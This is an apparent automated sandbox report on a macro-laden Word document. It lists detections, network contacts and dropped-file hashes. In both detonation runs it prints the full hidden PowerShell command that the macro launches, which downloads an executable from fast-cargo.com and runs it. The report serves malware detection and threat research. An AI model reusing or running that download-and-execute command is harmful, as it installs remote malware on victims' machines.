Malware Analysis Report

2025-01-22 19:12

Sample ID 240720-acxtcsxbnn
Target 5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118
SHA256 caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40
Tags
macro macro_on_action execution
score
10/10

Analysis Overview

score
10/10

SHA256

caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40

Threat Level: Known bad

The file 5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-20 00:04

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-20 00:04

Reported

2024-07-20 00:07

Platform

win7-20240704-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\9bk6.exe') {Remove-Item $env:APPDATA + '\9bk6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://fast-cargo.com/PAYMENT_details.exe', $env:APPDATA + '\9bk6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\9bk6.exe'); Stop-Process -Id $Pid -Force

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 fast-cargo.com udp
US 15.197.240.20:80 fast-cargo.com tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 8e91edc8e9eea09edc2c16e9853af672
SHA1 4e725f5ea832d84991708c93360cdf76a7281cad
SHA256 e76b18f23354ebe1a488326b2d30657ea756f2e6f11abdf4704f7c846c2e3b62
SHA512 37d77c94cf551b23e16dfb2df4c095d68a3c2c68036f50602e427caa10bc658153c30ee64ec24b5b350b59c5364261cc5e448b65ba38857d3d0b8906c1f44d43

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-20 00:04

Reported

2024-07-20 00:07

Platform

win10v2004-20240704-en

Max time kernel

143s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\9bk6.exe') {Remove-Item $env:APPDATA + '\9bk6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://fast-cargo.com/PAYMENT_details.exe', $env:APPDATA + '\9bk6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\9bk6.exe'); Stop-Process -Id $Pid -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 fast-cargo.com udp
US 15.197.240.20:80 fast-cargo.com tcp
US 8.8.8.8:53 20.240.197.15.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.17.209.140:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 140.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51pnatms.xzw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\9bk6.exe

MD5 e89f75f918dbdcee28604d4e09dd71d7
SHA1 f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA256 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA512 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 856d29ed80c98020fb3a982b5bddd602
SHA1 7cef913f0995ef32b56b42c60bcb64e134729183
SHA256 3a189ffef516d41e986efa4977e3a63eac037f47307f3f1ed5f5e42d6f174164
SHA512 6affce071fde9a220c7b859a129ec2fad8d364cb3c74d0582609a187f88252fb8e068a25690e43af7b81778a63a27c7e4c13342d44ffad82261715e500b92f9e

C:\Users\Admin\AppData\Local\Temp\TCDCE36.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
